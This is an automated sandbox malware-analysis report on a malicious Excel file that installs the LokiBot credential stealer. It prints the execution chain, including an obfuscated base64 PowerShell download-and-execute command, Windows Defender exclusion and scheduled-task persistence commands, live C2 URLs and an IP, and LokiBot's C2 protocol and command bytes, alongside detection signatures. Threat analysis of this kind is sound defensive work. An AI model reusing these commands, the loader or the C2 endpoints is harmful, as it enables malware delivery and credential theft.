Windows Analysis Report
Payment Advice.xls

Overview

General Information

Sample name: Payment Advice.xls
Analysis ID: 1559095
MD5: 5a69ac58c3133e24a783cf4ea670a243
SHA1: 7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
SHA256: f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Tags: xls, user-abuse_ch

Detection

HTMLPhisher, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3192 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3492 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3580 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3800 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • caspol.exe (PID: 3888 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
          • powershell.exe (PID: 3948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • schtasks.exe (PID: 4056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • caspol.exe (PID: 2596 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
    • AcroRd32.exe (PID: 2780 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • mshta.exe (PID: 3424 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3860 cmdline: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 1688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3016 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • caspol.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
          • powershell.exe (PID: 2456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 2524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • schtasks.exe (PID: 4028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • caspol.exe (PID: 3600 cmdline: "C:\Users\user\AppData\Roaming\caspol.exe" MD5: 74061922F1E78C237A66D12A15A18181)
  • taskeng.exe (PID: 1976 cmdline: taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rrwscqkDSNwLK.exe (PID: 1644 cmdline: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe MD5: 74061922F1E78C237A66D12A15A18181)
      • powershell.exe (PID: 956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 1944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3232 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • rrwscqkDSNwLK.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe" MD5: 74061922F1E78C237A66D12A15A18181)
  • cleanup
Name: Loki Password Stealer (PWS), LokiBot

Description:

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

File extension | File description
.exe | A copy of the malware that will execute every time the user account is logged into
.lck | A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server
.kdb | A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

Byte | Payload type
0x26 | Stolen Cryptocurrency Wallet
0x27 | Stolen Application Data
0x28 | Get C2 Commands from C2 Server
0x29 | Stolen File
0x2A | POS (Point of Sale?)
0x2B | Keylogger Data
0x2C | Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

Byte | Instruction description
0x00 | Download EXE & Execute
0x01 | Download DLL & Load #1
0x02 | Download DLL & Load #2
0x08 | Delete HDB File
0x09 | Start Keylogger
0x0A | Mine & Steal Data
0x0E | Exit Loki-Bot
0x0F | Upgrade Loki-Bot
0x10 | Change C2 Polling Frequency
0x11 | Delete Executables & Exit

Suricata Signatures

Rule SID | Rule name
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314 | ET TROJAN Loki Bot File Exfiltration Detected
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware configuration (extracted C2 list):
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
Yara matches (Source | Rule | Description | Author; matched strings listed beneath the entry where the report shows them)

dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security

00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
(47 entries in the full report; only the first are shown here)

28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack | Windows_Trojan_Lokibot_0f421617 | unknown | unknown
  • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
(37 entries in the full report; only the first are shown here)

System Summary

Source: File created; Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", ProcessId: 3948, ProcessName: powershell.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwY
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3192, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3492, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, ProcessId: 3680, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3580, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline", ProcessId: 3792, ProcessName: csc.exe
Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton; Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", ProcessId: 3948, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe
Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3888, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp", ProcessId: 4056, ProcessName: schtasks.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3192, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
